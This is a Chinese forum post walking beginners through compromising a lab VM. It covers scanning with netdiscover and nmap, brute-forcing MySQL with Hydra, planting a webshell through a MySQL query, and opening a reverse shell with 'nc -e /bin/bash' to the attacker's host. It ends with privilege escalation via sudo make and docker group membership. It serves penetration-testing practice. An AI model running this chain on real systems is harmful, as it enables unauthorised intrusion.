用户
搜索
  • TA的每日心情
    慵懒
    昨天 18:28
  • 签到天数: 78 天

    连续签到: 12 天

    [LV.6]常住居民II

    i春秋-核心白帽

    Rank: 4

    47

    主题

    59

    帖子

    1851

    魔法币
    收听
    0
    粉丝
    8
    注册时间
    2020-7-23
    发表于 2020-11-2 17:25:14 24926
    0x00:靶机下载
    新手级别,建议在virutalbox下做,由于是在virtualbox下做,所以偷懒了
    微信截图_20201101161711.png
    0x01:探测靶机
    还是先用netdiscover探测一波,直接找PCS可以确定靶机IP为192.168.3.216
    命令:netdiscover -r 192.168.3.0/16
    01.jpg
    然后开始用nmap探测波端口,这次端口开的比较多开了,21,22,80,3306和80
    命令:nmap -A -sS -sV -v -p- 192.168.3.216
    2.png


    在浏览器里面输入IP可以正常回显开挖
    3.png


    0x02:挖掘3306端口
    先用dirb开挖,然而换了几个字典都挖不出/index页面出来,这时候我忽然想起开了个3306端口
    4.png
    尝试连接以下,输入常见的密码,比如root, toor,空都不行,不过起码证明对外开放可以连接。
    5.png
    启动Hydra爆破成功
    6.png
    可以正常连接NICE
    7.png

    0x03:利用MYSQL一句话获得反弹shell
    这里拜访一波8080端口里面提示了路径和一些文件
    8.png
    输入其中的文件可以正常回显
    9.png
    然后这里查了以下MYSQL也有一句话,就是下面的select语句,写入一句话进入一个新文件,然后可以使用菜刀连接,再传一个PHP反弹shell上去getshell
    10.png

    不过这里为了方便还是把一句话的内容更改以下变成cmd,然后插入nc一句话方便点,现在MYSQL数据库插入一句话先
    11.png
    这时在8080端口刷新以下,插入成功
    12.png
    尝试输入一些命令执行语句成功执行
    13.png
    那么开启nc监听本地端口,然后输入nc一句话nc -e /bin/bash 192.168.3.207成功获得反弹shell
    14.png
    顺便在/home/dusk目录下得到flag
    15.png
    0x04:一次提权
    我是没想到有一天www-data也可以执行一波sudo -l.这里上网查了下,可以用make提权
    16.png

    这里按照sudo的方法更改以下加多一个-u dusk才可以完美执行变成dusk
    maketiquan.jpg

    17.png
    0x05:二次提权
    然而让我迷惑的是www-data可以运行sudo -l,而dusk不可以运行。。。。然后这里输入了id一波,有猫腻,出现了一堆东西连docker都出来了
    18.png
    这里查了以下可以依靠docker变成root权限
    19.png
    跟着它的步骤成功变成root权限顺便读到flag
    21.png

    20.png
    公众号:神隐(咸鱼)安全团队
    这个很简单啊
    使用道具 举报 回复

    emmmm因为我的面向对象以新手为主。如果觉得简单的话可以挑战一下中等到困难级别的靶机。
    公众号:神隐(咸鱼)安全团队
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册